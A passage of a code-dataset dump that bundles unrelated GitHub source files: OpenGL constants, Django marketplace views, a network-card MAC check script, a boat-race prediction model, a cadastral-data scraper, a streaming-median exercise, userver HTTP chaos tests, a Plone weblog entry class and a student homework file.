\"format_to_length\",\n \"texture_formats\",\n \"dtype_to_gl_iformat\",\n \"gl_iformat_to_dtype\",\n \"dtype_to_gl_format\",\n \"gl_format_to_dtype\",\n \"gl_iformat_to_gl_type\",\n \"texture_compare_funcs\",\n \"texture_compare_modes\",\n \"texture_min_filters\",\n \"texture_mag_filters\",\n \"texture_swizzles\",\n \"texture_wrapmodes\",\n \"primitive_types\",\n \"buffer_usages\",\n \"buffer_dimensions_to_primitive\",\n \"primitive_to_buffer_dimensions\",\n \"blend_functions\",\n \"blend_equations\",\n \"depth_functions\",\n \"draw_buffers\",\n \"hints\",\n \"provoking_vertices\",\n \"logic_op_modes\",\n \"provoke_modes\",\n \"color_read_formats\",\n \"color_read_types\",\n \"read_buffers\",\n \"transform_feedback_buffer_modes\",\n \"client_wait_sync_returns\",\n \"framebuffer_status\",\n \"cull_face_modes\",\n \"front_face_modes\",\n \"polygon_modes\",\n]\n\n","repo_name":"swenger/glitter","sub_path":"glitter/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":13465,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"32434116861","text":"from django.shortcuts import render, redirect\nfrom .forms import ExtendedUserForm, ItemForm, NewUserCreationForm, forms\nfrom .models import ExtendedUser, Item\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib import messages\n\n# Create your views here.\n\n\ndef home_view(request):\n return render(request, 'userHomePage.html', {'messages': messages.get_messages(request)})\n\n\ndef user_register(request):\n if request.method == 'POST':\n form_extended = ExtendedUserForm(request.POST)\n form_user = NewUserCreationForm(request.POST)\n if form_extended.is_valid() and form_user.is_valid():\n form_user.save() # Creates the user\n username = form_user.cleaned_data['username']\n user = User.objects.get(username=username) # Gets the user so that the extended user can be made\n e_user = ExtendedUser.objects.create(user=user, test=form_extended.cleaned_data['test'])\n login(request, user) # Login user\n messages.success(request, 'Account created and Logged in')\n return redirect('user_home')\n else:\n form_extended = ExtendedUserForm()\n form_user = NewUserCreationForm()\n return render(request, 'userForm.html',\n {'extendedUser_form': form_extended, 'user_form': form_user})\n\n\ndef create_item(request):\n if not request.user.is_authenticated:\n messages.error(request, 'You need to be logged in to create an item')\n return redirect('user_home')\n\n if request.method == 'POST':\n form = ItemForm(request.POST)\n if form.is_valid():\n user = ExtendedUser.objects.get(user=request.user)\n price = form.cleaned_data['price']\n title = form.cleaned_data['title']\n description = form.cleaned_data['title']\n Item.objects.create(user=user, price=price, title=title, description=description)\n\n messages.success(request, 'Item created')\n return redirect('user_home')\n else:\n form = ItemForm()\n return render(request, 'itemForm.html', {'item_form': form})\n\n\ndef user_logout(request):\n if not request.user.is_authenticated:\n messages.error(request, 'You are not logged')\n return redirect('user_home')\n\n logout(request)\n messages.success(request, 'Logged out')\n return redirect('user_home')\n\n\ndef user_login(request):\n if request.method == 'POST':\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n user = form.get_user()\n login(request, user)\n messages.success(request, 'Logged In')\n return redirect('user_home')\n else:\n form = form = AuthenticationForm()\n return render(request, 'loginPage.html', {'login_form': form})\n","repo_name":"HassM07/MarketPlace","sub_path":"extendedUser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27611124399","text":"#!/bin/env python\r\n\r\n\r\nimport re, subprocess\r\n\r\n\r\nmac_of_card = ''\r\nmac_of_user = ''\r\nnext_mac = ''\r\n\r\n\r\ndef user_mac_input(mac_user, offset):\r\n add_offset = int(mac_user.replace('',''), 16) + offset # turns mac to int and adds offset\r\n global next_mac\r\n next_mac = \":\".join(re.findall(\"..\", \"%012x\"%add_offset)) # returs the next mac\r\n global mac_of_user\r\n mac_of_user = mac_user\r\n\r\n\r\ndef find_mac_of_card(bus_num, ven_id):\r\n bus = list(subprocess.check_output(\"lspci -n |grep \" + f'{ven_id}'+ \" |awk {'print $1'} \", shell=True).decode().splitlines())\r\n portname = subprocess.check_output(\"lshw -businfo |grep \" + bus[bus_num] + \" |awk '{print $2}'\", shell=True).decode().strip()\r\n with open(\"/sys/class/net/\" + f'{portname}' + \"/address\") as f:\r\n global mac_of_card\r\n mac_of_card = f.read().strip().upper()\r\n\r\n\r\ndef mac_compare(ven_id_input, mac_user_input):\r\n portamount = subprocess.check_output(\"lspci -n |grep \" + f'{ven_id_input}' + \"| wc -l \", shell=True)\r\n find_mac_of_card(bus_num=0, ven_id=ven_id_input)\r\n mac_of_card_int = mac_of_card.replace(\":\", \"\")\r\n test = ''\r\n check = 'MAC Adrresses of card: \\n'\r\n if re.match(mac_user_input, mac_of_card_int, re.I):\r\n for x in range(0, int(portamount)):\r\n user_mac_input(mac_user=mac_user_input, offset=x)\r\n find_mac_of_card(bus_num=x, ven_id=ven_id_input)\r\n if re.match(next_mac, mac_of_card, re.I):\r\n test = \"PASS MAC\"\r\n else:\r\n test = \"FAIL MAC\"\r\n check = check + mac_of_card + \" \\n\"\r\n print(test)\r\n return check\r\n else:\r\n mac_not_match = \"MAC of user does not match first MAC of card\"\r\n print(mac_not_match)\r\n return mac_not_match\r\n\r\n\r\nif __name__ == '__main__':\r\n mac_compare()\r\n","repo_name":"MatanB99/ft_menu","sub_path":"FT_MENU/MAC_CHECK.py","file_name":"MAC_CHECK.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14692778506","text":"#データをもとに予測する。\nimport pandas as pd\nimport pickle\nimport lightgbm as lgb\n\ndef predict(df, stage):\n list_std = ['艇番', '全国2連率', '全国勝率', '当地勝率', '当地2連率', 'モータ2連率', 'ボード2連率', '級','展示タイム', 'スタート展示', '天気', 'レーサ番号']\n result_std = ['順位']\n odds_std = ['オッズ']\n stage = str(stage)\n one_params_rate = {'01': 1.71, '02': 1.83, '03': 1.47, '04': 1.93, '05': 1.80, '06': 1.66, '07': 1.86, '08': 0, '09': 0, '10': 0, '11': 0, '12': 0, '13': 0, '14': 0, '15': 0, '16': 0, '17': 0, '18': -1, '19': 1.76, '20': 0, '21': 1.59, '22': 1.92, '23':1.9, '24': -1}\n sub_params_rate = {'01': 1.95, '02': 1.92, '03': 1.88, '04': 1.84, '05': 1.75, '06': 1.84, '07': 1.86, '08': 0, '09': 0, '10': 0, '11': 0, '12': 0, '13': 0, '14': 0, '15': 0, '16': 0, '17': 0, '18': 1.93, '19': 1.79, '20': 0, '21': 1.75, '22': 1.94, '23':1.9, '24': 1.61}\n #前はデータをバイナリファイルに入れてなかったからここでデータをセットしてるが今ではそのデータがあるのでそれを読み込む\n #後は会場ごとにLightGBMの値が違うからそれを変更すること。オッズも(ここにリストを作っといてぶち込めばいけると思う)\n data = []\n x_text = '../../binaryfile/x_train_' + stage.zfill(2) +'.binaryfile'\n y_train = '../../binaryfile/y_train_' + stage.zfill(2) +'.binaryfile'\n\n with open(x_text, 'rb') as web:\n x_train = pickle.load(web)\n web.close\n\n with open(y_train, 'rb') as web:\n y_train = pickle.load(web)\n web.close\n\n #ここでファイルがない時のエラーが発生ここを修正\n\n \n \n one_rate = one_params_rate[stage.zfill(2)]\n sub_rate = sub_params_rate[stage.zfill(2)]\n lgb_train = lgb.Dataset(x_train, y_train)\n #データセット\n #もしデータがない場合returndataが空白になる。\n if one_rate > 0:\n params = {'task': 'train',\n 'boosting_type': 'gbdt',\n # 'objective': 'lambdarank', #←ここでランキング学習と指定!\n # 'metric': 'ndcg', # for lambdarank\n 'ndcg_eval_at': [1,2,3,4,5,6], # 3連単を予測したい\n 'max_position': 6, # 競艇は6位までしかない\n 'learning_rate': one_rate, \n # 'min_data': 1,\n # 'min_data_in_bin': 1,\n }\n #学習\n gbm = lgb.train(params, lgb_train)\n \n #決定\n y_pred = gbm.predict(df)\n\n rank = [0, 0, 0, 0, 0, 0]\n #[2.1, 1.9, 1.3, 4.1, 3.0, 5.0]\n for i, n in enumerate(sorted(y_pred)): #低い順番に並べ直す \n for j, m in enumerate(y_pred):\n if n == m:\n rank[j] = i + 1 \n\n #[3, 2, 1, 5, 4, 6]\n \n r_3 = []\n for i, number in enumerate(rank):\n if number == 1:\n r_3.append(i+1)\n\n r_3.append(5)\n\n data.append(r_3)\n\n #複勝\n if sub_rate > 0:\n params = {'task': 'train',\n 'boosting_type': 'gbdt',\n # 'objective': 'lambdarank', #←ここでランキング学習と指定!\n # 'metric': 'ndcg', # for lambdarank\n 'ndcg_eval_at': [1,2,3,4,5,6], # 3連単を予測したい\n 'max_position': 6, # 競艇は6位までしかない\n 'learning_rate': sub_rate, \n # 'min_data': 1,\n # 'min_data_in_bin': 1,\n }\n #学習\n gbm = lgb.train(params, lgb_train)\n \n #決定\n y_pred = gbm.predict(df)\n\n rank = [0, 0, 0, 0, 0, 0]\n #[2.1, 1.9, 1.3, 4.1, 3.0, 5.0]\n for i, n in enumerate(sorted(y_pred)): #低い順番に並べ直す \n for j, m in enumerate(y_pred):\n if n == m:\n rank[j] = i + 1 \n\n \n r_3 = []\n for i, number in enumerate(rank):\n if number == 1:\n r_3.append(i+1)\n\n r_3.append(6)\n\n data.append(r_3)\n\n #data=[1,5,3,6]\n #配列1番目と3番目の5と6は単勝とかの話\n \n return data\n\n\n\n","repo_name":"JunJon09/Boat_race","sub_path":"myproject/auto_buy/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37159817305","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass linear_n_dpeth(nn.Module):\r\n '''\r\n Linear Netwrok\r\n '''\r\n def __init__(self, layers_width):\r\n super().__init__()\r\n\r\n self.layers = nn.ModuleList([])\r\n for (i, layer_width) in enumerate(layers_width[0:-1]):\r\n next_layer_width = layers_width[i+1]\r\n self.layers.append(nn.Linear(layer_width, next_layer_width, bias=False))\r\n torch.nn.init.normal_(self.layers[i].weight, mean=0.0, std=0.01)\r\n\r\n def forward(self, x):\r\n output = x\r\n for layer in self.layers:\r\n output = layer(output)\r\n\r\n return output","repo_name":"idanbasre/Overparameterization","sub_path":"trainer/LinearNDepthNet.py","file_name":"LinearNDepthNet.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8395198171","text":"# Design a class to calculate the median of a number stream. The class should have the following two methods:\n\n# insertNum(int num): stores the number in the class\n# findMedian(): returns the median of all numbers inserted in the class\n\n# If the count of numbers inserted in the class is even, the median will be the average of the middle two numbers.\n\n# Example 1:\n\n# 1. insertNum(3)\n# 2. insertNum(1)\n# 3. findMedian() -> output: 2\n# 4. insertNum(5)\n# 5. findMedian() -> output: 3\n# 6. insertNum(4)\nfrom heapq import *\n\nclass MedianOfAStream:\n\n def __init__(self):\n self.small, self.large = [], []\n\n def insert_num(self, num):\n \n heappush(self.small, -num)\n\n if self.small and self.large and -(self.small[0]) > self.large[0]:\n heappush(self.large, -heappop(self.small))\n\n if len(self.small) - len(self.large) > 1:\n heappush(self.large, -heappop(self.small))\n \n if len(self.large) - len(self.small) > 1:\n heappush(self.small, -heappop(self.large))\n\n print(self.small, self.large)\n\n def find_median(self):\n\n if len(self.small) > len(self.large):\n return -self.small[0]\n elif len(self.large) > len(self.small):\n return self.large[0]\n else:\n return (-self.small[0] + self.large[0]) / 2\n\n\ndef main():\n medianOfAStream = MedianOfAStream()\n medianOfAStream.insert_num(3)\n medianOfAStream.insert_num(1)\n print(\"The median is: \" + str(medianOfAStream.find_median()))\n medianOfAStream.insert_num(5)\n print(\"The median is: \" + str(medianOfAStream.find_median()))\n medianOfAStream.insert_num(4)\n print(\"The median is: \" + str(medianOfAStream.find_median()))\n\n\nmain()\n ","repo_name":"ashutosh-874/InterviewPrep","sub_path":"9. Two Heaps/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42901450148","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 13 00:05:09 2020\r\n\r\n@author: denis\r\n\"\"\"\r\n\r\nimport schedule\r\nimport time\r\nimport requests\r\n\r\nimport asyncio\r\nimport get_object_data\r\n\r\nheaders = {\r\n 'Content-Type':'application/json; charset=utf-8',\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',\r\n}\r\n\r\nout_path = 'C:\\\\Users\\\\denis\\\\python\\\\hack_pkk\\\\presentaton\\\\kadast\\\\object\\\\'\r\n\r\n\r\nclass parser:\r\n \r\n def __init__(self, type_id = 1, sqot = 1, limit = 10):\r\n self.type_id = type_id\r\n self.sqo = ''\r\n self.text = ''\r\n self.sqot = sqot\r\n self.limit = limit \r\n #self.skip = self.limit\r\n self.offset = 0\r\n self.buffer = []\r\n self.errors = []\r\n self.file = []\r\n self.headers = {\r\n 'Content-Type':'application/json; charset=utf-8',\r\n 'User-Agent':'Mozilla/1.0 (Windows 1.0; Win4; x4; rv:2.0) Gecko/201 Firefox/2.0',\r\n }\r\n\t\t\r\n\t\t\t\r\n def ParseUrl_sqo(self, sqo, skip):\r\n\t\t\r\n self.sqo = sqo\r\n self.skip = skip\r\n \r\n for sqo_i in self.sqo:\r\n status_code = 0\r\n\r\n try:\r\n while status_code != 200:\r\n #print ('Object: ' + str(sqo_i) + ', offset: ' + str(self.offset))\r\n r = requests.get('https://pkk.rosreestr.ru/api/features/' + str(self.type_id) + '?sqo=' + str(sqo_i) + '&sqot='+ str(self.sqot) + '&limit=' + str(self.limit) + '&skip=' + str(self.skip), headers=headers, timeout=(60, 60))\r\n status_code = r.status_code\r\n time.sleep(1)\r\n if len(r.json()['features']) != 0:\r\n for elem in r.json()['features']:\r\n self.buffer.append (elem)\r\n self.offset += 1\r\n if self.skip + self.limit > 200:\r\n break\r\n self.ParseUrl(self.sqo, self.skip + self.limit)\r\n except:\r\n self.errors.append('https://pkk.rosreestr.ru/api/features/' + str(self.type_id) + '?sqo=' + str(sqo_i) + '&sqot='+ str(self.sqot) + '&limit=' + str(self.limit) + '&skip=' + str(self.skip)) \r\n\t\r\n def ParseUrl_text(self, text, skip):\r\n\t\t\r\n self.text = text\r\n self.skip = skip\r\n \r\n for text_i in self.text:\r\n status_code = 0\r\n\r\n try:\r\n while status_code != 200:\r\n print ('Object: ' + str(text_i) + ', offset: ' + str(self.offset))\r\n r = requests.get('https://pkk.rosreestr.ru/api/features/' + str(self.type_id) + '?text=' + str(text_i) + '&limit=' + str(self.limit) + '&skip=' + str(self.skip), headers=headers, timeout=(60, 60))\r\n #print ('https://pkk.rosreestr.ru/api/features/' + str(self.type_id) + '?text=' + str(text_i) + '&limit=' + str(self.limit) + '&skip=' + str(self.skip))\r\n status_code = r.status_code\r\n time.sleep(1)\r\n if len(r.json()['features']) != 0:\r\n for elem in r.json()['features']:\r\n self.buffer.append (elem)\r\n self.offset += 1\r\n if self.skip + self.limit > 9:\r\n break\r\n self.ParseUrl_text(self.text, self.skip + self.limit)\r\n except:\r\n self.errors.append('https://pkk.rosreestr.ru/api/features/' + str(self.type_id) + '?text=' + str(text_i) + '&limit=' + str(self.limit) + '&skip=' + str(self.skip)) \t\t\r\n\t \r\n def output(self):\r\n print (self.buffer)\r\n\r\n def output_h(self):\r\n return self.buffer\r\n\r\n def save_buffer(self, path, file_name):\r\n \r\n id_fields = [x['attrs']['id'] + '\\n' for x in self.buffer]\r\n with open(path + file_name, 'w') as file:\r\n file.writelines(id_fields)\r\n\r\ndef t():\r\n print(\"+\")\r\n\r\n \r\n \r\ndef get_new_objects():\r\n \r\n #получаем список районов\r\n r_get = parser(3, 4, 10)\r\n r_get.ParseUrl_text(['59:*'], 0)\r\n raions = [x['attrs']['id'] for x in r_get.output_h()]\r\n \r\n #получаем список кварталов\r\n kvartals = []\r\n for raion in raions:\r\n k_get = parser(2, 1, 10)\r\n k_get.ParseUrl_text([ raion +':*'], 0)\r\n for x in k_get.output_h():\r\n kvartals.append(x['attrs']['id']) \r\n\r\n #получаем список участков\r\n feilds = []\r\n for kvartal in kvartals[:5]:\r\n f_get = parser(1, 1, 10)\r\n f_get.ParseUrl_text([ kvartal +':*'], 0)\r\n for x in f_get.output_h():\r\n feilds.append(x['attrs']['id'])\r\n\r\n# промежуточное сохранение \r\n# with open( out_path + 'objects.txt', 'w') as file:\r\n# file.write(\"\\n\".join(feilds))\r\n\r\n\r\n# сохраняем данные по каждому участку\r\n loop = asyncio.get_event_loop() \r\n loop.create_task(get_object_data._main(feilds))\r\n\r\n\r\nif __name__ == '__main__':\r\n# #schedule.every().monday.do(get_new_objects)\r\n# while True:\r\n# schedule.run_pending()\r\n# time.sleep(1)\r\n \r\n get_new_objects()\r\n ","repo_name":"darkzenon/mirs_pk","sub_path":"pkk_get_kadastr.py","file_name":"pkk_get_kadastr.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30986345320","text":"from zope.interface import implements\nfrom AccessControl import ClassSecurityInfo\nfrom DateTime.DateTime import DateTime\n\n# Plone imports\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFCore.WorkflowCore import WorkflowException\nfrom Products.CMFPlone.utils import log\nfrom Products.CMFDynamicViewFTI.browserdefault import BrowserDefaultMixin\n\n# Archetypes imports\nfrom Products.Archetypes.public import BaseSchema\nfrom Products.Archetypes.public import Schema\nfrom Products.Archetypes.public import TextField\nfrom Products.Archetypes.public import TextAreaWidget\nfrom Products.Archetypes.public import RichWidget\nfrom Products.Archetypes.public import BaseContent\nfrom Products.Archetypes.public import registerType\nfrom Products.Archetypes.Marshall import RFC822Marshaller\n\n# Quills imports\nfrom Products.Quills import QuillsMessageFactory as _\nfrom quills.core.interfaces import IWorkflowedWeblogEntry\nfrom quills.app.topic import Topic\nfrom quills.app.topic import AuthorTopic\nfrom quills.app.utilities import QuillsMixin\nfrom quills.app.interfaces import IWeblogEnhancedConfiguration\n\n# Local imports\nfrom config import PROJECTNAME\nimport permissions as perms\n\nWeblogEntrySchema = BaseSchema.copy() + Schema((\n\n TextField('description',\n searchable=1,\n accessor='Description',\n widget=TextAreaWidget(\n label=_(u'label_weblogentry_description', default=u'Excerpt'),\n description=_(u'help_weblogentry_description', default='A brief introduction for this entry.'),\n ),\n ),\n\n TextField('text',\n searchable=1,\n default_output_type='text/x-html-safe',\n widget=RichWidget(\n label=_(u'label_text', default=u'Entry Text'),\n rows=30,\n ),\n ),\n ),\n marshall=RFC822Marshaller(),\n)\n\n# Move the subject/topic picking to the main edit view as it should be used\n# for every edit, really.\nWeblogEntrySchema['subject'].schemata = 'default'\n# The subject is not language-specific\nWeblogEntrySchema['subject'].languageIndependent = True,\n# Make sure it is presented after the main text entry field.\nWeblogEntrySchema.moveField('subject', after='text')\n# Make sure the allowDiscussion field's default is None\nWeblogEntrySchema['allowDiscussion'].default = None\n# Put the discussion setting on the main page...\nWeblogEntrySchema['allowDiscussion'].schemata = 'default'\n# ... at the bottom, after the subject keywords.\nWeblogEntrySchema.moveField('allowDiscussion', after='subject')\n\n\nclass WeblogEntry(QuillsMixin, BaseContent, BrowserDefaultMixin):\n \"\"\"Basic Weblog Entry.\n\n >>> from zope.interface.verify import verifyClass\n >>> verifyClass(IWorkflowedWeblogEntry, WeblogEntry)\n True\n \"\"\"\n\n implements(IWorkflowedWeblogEntry)\n\n schema = WeblogEntrySchema\n _at_rename_after_creation = True\n\n security = ClassSecurityInfo()\n\n security.declareProtected(perms.View, 'getTitle')\n def getTitle(self):\n \"\"\"See IWeblogEntry.\n \"\"\"\n return self.Title()\n\n security.declareProtected(perms.View, 'getTopics')\n def getTopics(self):\n \"\"\"See IWeblogEntry.\n \"\"\"\n weblog = self.getWeblog()\n keywords = self.Subject()\n return [Topic(kw).__of__(weblog) for kw in keywords]\n\n security.declareProtected(perms.View, 'getAuthors')\n def getAuthors(self):\n \"\"\"See IWeblogEntry.\n \"\"\"\n weblog = self.getWeblog()\n creators = self.Creators()\n return [AuthorTopic(creator).__of__(weblog) for creator in creators]\n\n security.declareProtected(perms.View, 'getExcerpt')\n def getExcerpt(self):\n \"\"\"See IWeblogEntry.\n \"\"\"\n # This is just an alias for Description in this case.\n return self.Description()\n\n security.declareProtected(perms.EditContent, 'setExcerpt')\n def setExcerpt(self, excerpt):\n \"\"\"See IWeblogEntry.\n \"\"\"\n self.setDescription(excerpt)\n\n security.declareProtected(perms.EditContent, 'setTopics')\n def setTopics(self, topic_ids):\n \"\"\"See IWeblogEntry.\n \"\"\"\n self.setSubject(topic_ids)\n\n def setText(self, text, mimetype=None):\n \"\"\"docstring for setText\"\"\"\n # if no mimetype was specified, we use the default\n if mimetype is None:\n mimetype = self.getMimeType()\n \n if hasattr(self, 'text'):\n \tself.text.update(text, self, mimetype=mimetype)\n \telse:\n \tfield = self.getField('text')\n \tfield.set(self, text, mimetype=mimetype)\n\n security.declareProtected(perms.EditContent, 'edit')\n def edit(self, title, excerpt, text, topics, mimetype=None):\n \"\"\"See IWeblogEntry.\n \"\"\"\n # if no mimetype was specified, we use the default\n if mimetype is None:\n mimetype = self.getMimeType()\n self.setText(text, mimetype=mimetype)\n self.setTitle(title)\n self.setExcerpt(excerpt)\n if topics:\n self.setTopics(topics)\n else:\n self.setTopics([])\n self.reindexObject()\n\n security.declareProtected(perms.View, 'effective')\n def effective(self):\n \"\"\"Answer the date this entry became visible (published), or the\n creation date if the former is not defined.\n\n This is essentially a hotfix because Quills expects the effective\n date always to be defined, which is not the case (see Quills\n issue #126). \n \n This is what fatsyndication feedentry does also. But here we are\n not redefining getEffectiveDate because \"effective\" will be used\n for cataloging.\n \"\"\"\n return self.getField('effectiveDate').get(self) or self.created()\n\n security.declareProtected(perms.View, 'getPublicationDate')\n def getPublicationDate(self):\n \"\"\"See IWeblogEntry.\n \"\"\"\n return self.getEffectiveDate()\n\n security.declareProtected(perms.View, 'getMimeType')\n def getMimeType(self):\n \"\"\"See IWeblogEntry.\n \"\"\"\n # (ATCT handles the mechanics for determining the default for us)\n return self.text.getContentType()\n\n security.declareProtected(perms.EditContent, 'setPublicationDate')\n def setPublicationDate(self, datetime):\n \"\"\"See IWeblogEntry.\n \"\"\"\n self.setEffectiveDate(datetime)\n\n security.declareProtected(perms.EditContent, 'publish')\n def publish(self, pubdate=None):\n \"\"\"See IWorkflowedWeblogEntry.\n \"\"\"\n if self.isPublished():\n # do nothing if the entry has already been published\n return\n # XXX Need to be able to handle std library datetime objects for pubdate\n if pubdate is None:\n pubdate = DateTime()\n self.setPublicationDate(pubdate)\n wf_tool = getToolByName(self, 'portal_workflow')\n try:\n wf_tool.doActionFor(self, 'publish')\n except WorkflowException:\n state = wf_tool.getInfoFor(self, 'review_state')\n workflow = wf_tool.getWorkflowsFor(self)[0].id\n objectPath = \"/\".join(self.getPhysicalPath())\n log(\"WeblogEntry.publish failed, most probable because the current \" \n \"state '%s' of workflow '%s' of entry '%s' does not define a \"\n \"transition 'publish'. To solve this either use another workflow, \"\n \"adapt the workflow, or restrain from using this method for now. \"\n \"Sorry.\" % (state, workflow, objectPath))\n raise\n self.reindexObject()\n\n security.declareProtected(perms.EditContent, 'retract')\n def retract(self):\n \"\"\"See IWorkflowedWeblogEntry.\n \"\"\"\n if not self.isPublished():\n # do nothing if the entry has already been private\n return\n wf_tool = getToolByName(self, 'portal_workflow')\n try:\n wf_tool.doActionFor(self, 'retract')\n except WorkflowException:\n state = wf_tool.getInfoFor(self, 'review_state')\n workflow = wf_tool.getWorkflowsFor(self)[0].id\n objectPath = \"/\".join(self.getPhysicalPath())\n log(\"WeblogEntry.retract failed, most probable because the current \" \n \"state '%s' of workflow '%s' of entry '%s' does not define a \"\n \"transition 'retract'. To solve this either use another workflow, \"\n \"adapt the workflow, or restrain from using this method for now. \"\n \"Sorry.\" % (state, workflow, objectPath))\n raise\n self.setPublicationDate(None)\n self.reindexObject()\n\n security.declareProtected(perms.EditContent, 'isPublished')\n def isPublished(self):\n \"\"\"See IWorkflowedWeblogEntry.\n \"\"\"\n wf_tool = getToolByName(self, 'portal_workflow')\n review_state = wf_tool.getInfoFor(self, 'review_state')\n weblog_config = IWeblogEnhancedConfiguration(self.getWeblog())\n return review_state in weblog_config.published_states\n\n security.declareProtected(perms.View, 'getWeblogEntryContentObject')\n def getWeblogEntryContentObject(self):\n \"\"\"See IWeblogEntry.\n \"\"\"\n return self\n\n\nregisterType(WeblogEntry, PROJECTNAME)\n","repo_name":"collective/Products.Quills","sub_path":"Products/Quills/WeblogEntry.py","file_name":"WeblogEntry.py","file_ext":"py","file_size_in_byte":9332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19823235367","text":"import pytest\n\n\n@pytest.fixture\ndef call(service_client, for_client_gate_port, gate):\n async def _call(htype='common', headers=None, **args):\n return await service_client.get(\n '/chaos/httpclient',\n params={'type': htype, 'port': str(for_client_gate_port), **args},\n headers=headers or {},\n )\n\n return _call\n\n\n@pytest.fixture\ndef ok_mock(mockserver):\n @mockserver.handler('/test')\n async def mock(_request):\n return mockserver.make_response('OK!')\n\n return mock\n\n\nasync def test_ok(call, ok_mock):\n response = await call()\n assert response.status == 200\n assert response.text == 'OK!'\n\n\nasync def test_stop_accepting(call, gate, ok_mock):\n response = await call()\n assert response.status == 200\n assert gate.connections_count() >= 1\n\n await gate.stop_accepting()\n await gate.sockets_close() # close keepalive connections\n assert gate.connections_count() == 0\n\n response = await call()\n assert response.status == 500\n assert gate.connections_count() == 0\n\n gate.start_accepting()\n\n response = await call()\n assert response.status == 200\n assert gate.connections_count() >= 1\n\n\nasync def test_close_after_headers(call, gate, mockserver):\n @mockserver.handler('/test')\n async def _mock(request):\n if on:\n await gate.sockets_close()\n return mockserver.make_response('OK!')\n\n on = True\n response = await call()\n assert response.status == 500\n\n on = False\n response = await call()\n assert response.status == 200\n\n\nasync def test_required_headers(call, gate, ok_mock):\n required_headers = ['X-YaRequestId', 'X-YaSpanId', 'X-YaTraceId']\n\n response = await call()\n assert response.status == 200\n assert all(key in response.headers for key in required_headers)\n\n await gate.stop_accepting()\n await gate.sockets_close() # close keepalive connections\n assert gate.connections_count() == 0\n\n response = await call()\n assert response.status == 500\n assert all(key in response.headers for key in required_headers)\n assert gate.connections_count() == 0\n","repo_name":"userver-framework/userver","sub_path":"core/functional_tests/basic_chaos/tests/httpclient/test_httpclient.py","file_name":"test_httpclient.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":2029,"dataset":"github-code","pt":"52"} +{"seq_id":"17924913217","text":"#Sara D'Alessandro\n#Homework #3\n\nimport random\n\n#PROBLEM 1:\nsum1 = 0\nfor i in range (101):\n sum1 = sum1 + i\n\nprint(sum1)\n\nsum2 = 0\nfor i in range (101):\n if i % 2 == 0:\n sum2 += i\n\nprint(sum2)\n\nsum3 = 0\nfor i in range (100):\n if i % 2 == 1:\n sum3 += i\n\nprint(sum3)\n\n\n\n#PROBLEM 2:\ndef dna_to_rna(x):\n \n base = [\"A\",\"C\",\"G\",\"T\"]\n rnabase = [\"U\",\"G\",\"C\",\"A\"]\n \n print(\"RNA sequence will be: \", end=\"\")\n\n for i in x:\n if i == 'A': \n print(rnabase[0], end=\"\")\n elif i == 'C':\n print(rnabase[1], end=\"\")\n elif i == 'G':\n print(rnabase[2], end=\"\")\n elif i == 'T':\n print(rnabase[3], end=\"\")\n else:\n pass\n\n cont()\n\ndef cont():\n\n cont = input(\"Enter another DNA sequence or enter 'X' to quit: \")\n if cont == 'X':\n print(\"Peace out my dude.\")\n else:\n dna_to_rna(cont)\n \nprint(\"Welcome to the DNA to RNA Nucleotide Converter-er.\") \ndna = input(\"Enter DNA sequence: \")\n\ndna_to_rna(dna)\n\n\n\n#PROBLEM 3:\n\nimport random\nimport math\n\nx1 = random.randint(0,30)\ny1 = random.randint(0,30)\n\ndef menu():\n\n\tx = 15\n\ty = 15\n\n\tprint(\"Welcome to the Hunt, you doomed, ill-fated soul.\")\n\tcommand = input(\"Enter a direction, such as 'N', 'S', 'E', 'W', or enter 'X' to flee (exit): \")\n\n\tif command in 'Nn':\n\t\ty = y + 1\n\t\tresult(x,y)\n\telif command in 'Ss':\n\t\ty = y - 1\n\t\tresult(x,y)\n\telif command in 'Ee':\n\t\tx = x + 1\n\t\tresult(x,y)\n\telif command in 'Ww':\n\t\tx = x - 1\n\t\tresult(x,y)\n\telif command in 'Xx':\n\t\tprint(\"We await your return, Hunter.\")\n\telse:\n\t\tprint(\"You have been foiled, Hunter. Try again... if you dare.\")\n\n\ndef result(x,y):\n\n\tdistance = round(math.sqrt((x-x1)*(x-x1)+(y-y1)*(y-y1)))\n\n\tif distance == 0:\n\t\tprint(\"Well played. Against all odds, you found the secret treasure.\")\n\n\tif distance > 0:\n\t\tprint(\"You are\", distance, \"spaces away from the sunken secret place.\")\n\t\tprint(\"Your current coordinates are\",x,y,\".\")\n\t\tcommand = input(\"Enter a direction such as 'N', 'S', 'E', 'W', or 'X' to exit: \")\n\n\t\tif command in 'Nn':\n\t\t\ty = y + 1\n\t\t\tresult(x,y)\n\t\telif command in 'Ss':\n\t\t\ty = y - 1\n\t\t\tresult(x,y)\n\t\telif command in 'Ee':\n\t\t\tx = x + 1\n\t\t\tresult(x,y)\n\t\telif command in 'Ww':\n\t\t\tx = x - 